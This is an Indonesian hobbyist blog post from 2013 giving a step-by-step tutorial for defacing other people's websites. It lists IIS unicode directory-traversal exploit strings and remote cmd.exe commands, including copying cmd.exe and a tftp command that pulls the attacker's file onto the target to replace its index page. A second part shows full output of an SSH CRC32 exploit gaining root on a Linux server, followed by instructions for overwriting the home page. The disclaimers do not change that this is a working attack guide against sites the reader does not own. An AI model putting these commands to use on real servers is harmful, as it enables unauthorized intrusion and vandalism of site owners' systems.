Selasa, 14 Mei 2013

Cara Deface Website

Cara Deface Website

Zzzz..... *Clink* "We Come Back" (((dolby stereo))) Very Happy pakabar sob ?? gimana da pahamin lom posting sebelumnya?? pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ? hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat ato bahkan berlipat-lipat Very Happy. Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali kontoversi baik positif/negatif, posting kali ini bukannya ngajarin kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen berbagi pengetahuan saja ga` ada motif laen dan kita juga ga menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya manusia yang egois dan selalu mendahulukan kepuasan batin nah.. itu awal dari kehancuran kita sendiri dan nantinya dimintai pertanggung-jawaban dari semua itu.

Aduh, koq jadi ngelantur gini ya Smile) Ok Sob , kita langusng ke pokok pembahasan tapi pesan kita "Resiko Ditanggung Masing - Masing". Pada posting ini kita coba membahas "deface website" apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :

1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)


Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah
kowe.....Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di [You must be registered and logged in to see this link.] site yah..??...Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka [You must be registered and logged in to see this link.] page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg
bisa and DL di [You must be registered and logged in to see this link.] or memakai cara manual yg lebih sering kita gunakan ehehhehehhee...contoh:

[You must be registered and logged in to see this link.]

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
[You must be registered and logged in to see this link.] tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu "[You must be registered and logged in to see this link.]
· Bagian exploit string, yaitu "/scripts/..%255c..%255c"
· Bagian folder, yaitu "/winnt/system32/"
· Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

[You must be registered and logged in to see this link.]

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

[You must be registered and logged in to see this link.]

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh... .hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
[You must be registered and logged in to see this link.] == neh yg ini......di situ kan alias di
[You must be registered and logged in to see this link.]
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

[You must be registered and logged in to see this link.]
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : [You must be registered and logged in to see this link.] kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

[You must be registered and logged in to see this link.]

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :

[You must be registered and logged in to see this link.]

Pasti hasilnya akan seperti di bawah ini :

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini
Kita liat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi

Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :

* Bagian hosting dan exploit string yaitu, [You must be registered and logged in to see this link.]
* Bagian command yaitu, cmdku.exe?/c+echo+
* Bagian HTML
* Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html

Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di [You must be registered and logged in to see this link.] ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :

* [You must be registered and logged in to see this link.]
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
up-load)+ C:\InetPub\wwwroot\main.html

Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.

Sayah akan uraikan juga URL tadee menjadi 4 bagian :

* Bagian hosting dan exploit string yaitu, [You must be registered and logged in to see this link.]
* Bagian folder, yaitu /winnt/system32/
* Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
* Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html

Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.

--------------------------------------------END--------------------------------------------------

Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!"

Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :

[root@juventini]# ./x10 -t1 192.168.1.120

password:

Target: Small - SSH-1.5-1.2.26

Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED #
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV #
(7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV #
(9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED #
(10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV #
(12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV #
(13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV #
(14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED #
(15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083f9a14 # SURVIVED #
Exact match found at: 0x000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h - stack_buf distance
(34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED #
(35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0x0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0x0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0x0010# SEGV #
(40) trying: 0xb7f7dd70 slider: 0x0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0x0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

localhost.localdomain

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

.....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...Wink), gini caranya :

1. ganti dulu nama indexnyamv index.htm oldindex.htm
2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm
3. masukan HTML yang kalian buat di vi ataupun pico tadi
4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..Smile)) SiiiPPPP..!!

Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!! hehehheudah dulu yah...BUBAYYYYYY!!!!!!!!!!!! 

Tidak ada komentar:

Poskan Komentar